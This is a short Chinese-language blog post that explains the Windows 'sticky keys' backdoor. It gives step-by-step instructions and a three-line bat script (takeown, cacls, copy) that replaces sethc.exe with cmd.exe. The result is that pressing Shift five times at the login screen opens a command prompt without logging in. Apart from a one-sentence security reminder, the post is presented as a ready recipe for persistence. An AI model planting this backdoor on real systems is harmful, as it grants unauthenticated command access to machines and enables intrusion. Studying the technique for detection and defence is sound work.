本文介绍了如何利用Windows图形化界面的粘滞键功能创建后门。当系统未登录时,连续按下5次Shift键通常会激活粘滞键功能,但通过管理员权限修改sethc.exe(粘滞键程序)为cmd.exe,可以实现在未登录状态下执行命令行,从而创建潜在的安全风险。详细步骤包括修改文件所有者、设置权限、替换文件等,并提供了相应的bat脚本。此方法提醒我们关注系统安全,防止恶意利用。
(windows图形化界)粘滞键后门
思路:windows图形化界面未登入用户时,连按5次Shift键粘滞键的程序依然可以弹出,若若把粘滞键的程序改为其他程序则有不一样的效果(如cmd程序)。
一、手动直接修改文件名
①在windows 中C:\Windows\System32下找到sethc.exe(辅助功能快捷键),发现无法直接修改文件名且提示《您需要TrustedInstaller提供的权限才能对此文件进行更改》,没有权限,权限属于另一个用户组。
②在管理员权限下修改sethc.exe的所有者
③设置权限
④将sethc.exe文件删除或者修改文件都可。对cmd.exe程序执行上述②③相同步骤,将其命名为sethc.exe。即可实现粘滞键后门。
⑤注销测试
- Bat
takeown命令用于修改文件或目录所有者,/F参数用于指定文件或目录,/A参数指替换管理员组为所有者/E参数指编辑ACL而不替换,/G参数指赋予指定用户的权限。
takeown /F C:\Windows\System32\sethc.exe /A //将system32目录下的所有文件都修改所有者为本地管理员组
cacls C:\Windows\System32\sethc.exe /E /G administrator:F //将system32目录下的所有文件的访问控制列表都为管理员组的用户添加完全控制的权限,用于删除文件、重命名。
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe //删除sethc.exe将cmd.exe的文件名改为sethc.exe
bat脚本如下:
```
takeown /F C:\Windows\System32\sethc.exe /A
cacls C:\Windows\System32\sethc.exe /E /G administrator:F
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
```
测试:
注销测试:
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
